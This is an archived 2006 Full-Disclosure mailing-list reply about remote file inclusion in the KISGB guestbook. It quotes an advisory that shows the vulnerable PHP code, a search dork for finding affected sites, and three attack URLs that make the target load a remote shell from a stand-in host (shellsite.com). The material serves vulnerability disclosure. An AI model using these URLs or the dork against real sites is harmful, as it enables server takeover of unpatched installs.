lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [day] [month] [year] [list]
Date: Fri, 22 Dec 2006 16:08:41 -0600
From: str0ke <str0ke@...w0rm.com>
To: "0o_zeus_o0 elitemexico.org" <zeus.olimpusklan@...il.com>
Cc: vuln@...unia.com, bugtraq@...e-h.org, full-disclosure@...ts.grok.org.uk,
	bugtraq@...urityfocus.com, org@...urity.nnov.ru,
	submit@...w0rm.com, admin@...e-h.org
Subject: Re: Multiple Remote Vulnerabilities in KISGB

Dear 0o_zeus_o0 elitemexico.org,

 Thanks, this won't be going up since this was posted on milw0rm today
around 4-6 hours ago for the original author mdx.

http://www.milw0rm.com/exploits/2979.

The only affected script is authenticate.php with the
default_path_for_themes variable.  The rest of them just
include/require the vulnerable script.

/str0ke

On 12/22/06, 0o_zeus_o0 elitemexico.org <zeus.olimpusklan@...il.com> wrote:
> ###########################################################################
> # Advisory #15 Title: Multiple Remote Vulnerabilities in KISGB
> #
> # Author: 0o_zeus_o0 ( Arturo Z. )
> # Contact: zeus@...sdelared.com
> # Website: www.diosdelared.com
> # Date: 22/12/06
> # Risk: critical
> # Vendor Url: http://sourceforge.net/projects/kisgb ,
> http://ravenphpscripts.com
> # Affected Software: Keep It Simple Guest Book
> # search: inurl:kisgb , intitle:KISGB
> #
> #Info:
> ##################################################################
> #Bug is risky by since it is possible to be included I cosay malisioso
> #that allows to see or to modify the archives
> #code:
> #if (isset($default_path_for_themes))
> require("$default_path_for_themes/$theme");
> #else require("$path_to_themes/$theme");
> ##################################################################
> #
> #
> #http://site/path/gbpath/authenticate.php?path_to_themes=
> http://shellsite.com/php.gif?
> #
> #http://site/path/gbpath/admin.php?default_path_for_themes=http://shellsite.com/php.gif?
> #
> #http://site/path/gbpath/upconfig.php?default_path_for_themes=
> http://shellsite.com/php.gif?
> ##################################################################
> #VULNERABLE VERSIONS
> ##################################################################
> # 5.0.0
> #
> ##################################################################
> #Contact information
> #0o_zeus_o0
> #zeus@...sdelared.com
> #www.diosdelared.com
> ##################################################################
> #greetz: S.S.M, sams, a mi beba
> #Original Advisory: http://diosdelared.com/15.txt
> ##################################################################

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists